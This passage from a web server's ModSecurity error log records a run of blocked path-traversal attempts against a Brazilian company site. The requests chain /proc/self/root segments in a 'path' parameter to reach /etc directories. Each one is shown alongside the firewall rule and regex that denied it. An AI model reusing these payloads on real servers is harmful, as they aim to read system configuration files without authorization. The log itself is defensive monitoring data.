"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjwbABkC4fWIHEf8ELFQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:42.744390 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:42958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjwqQpVkWug9HeOt9LvAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:10:43.211306 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.243.203:32868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjw8_BxrYCr4hPDw8AOgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:44.140937 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:35300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjxFajLEzk2WiQ-10otAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:10:44.551902 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.243.203:32872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjxKTCbgAP5jq5TehCowAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:45.959866 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:32886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjxY6lpbStxTqkSkuAdQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:47.087067 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:32898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjx7ysWC90G-1nBrBaDwAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:48.475202 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:32904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjyLABkC4fWIHEf8ELGQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:49.821318 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.243.203:32920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjyUr9dMAiw-8KANNdVAAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:51.137037 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:56842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjy6TCbgAP5jq5TehCrwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:55.327310 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:56854] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjzLysWC90G-1nBrBaEAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:56.764603 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:56870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj0I6lpbStxTqkSkuAfgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:58.063146 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:56878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj0o6lpbStxTqkSkuAgAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:59.248820 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:56892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj07ABkC4fWIHEf8ELHAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:00.653786 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:49524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj1I6lpbStxTqkSkuAhAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:01.933378 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:49532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj1bABkC4fWIHEf8ELHwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:03.133233 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:49538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj18_BxrYCr4hPDw8APwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:04.480200 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.243.203:49552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj2FajLEzk2WiQ-10ouwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:05.656935 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:49566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj2dSswJuvopo3lOh1AwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:06.975648 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:49572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj2o6lpbStxTqkSkuAhQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:08.351814 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:49582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj3KQpVkWug9HeOt9LwAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:09.624898 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:49598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj3dSswJuvopo3lOh1BQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:11.042260 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:59654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhj39SswJuvopo3lOh1BgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
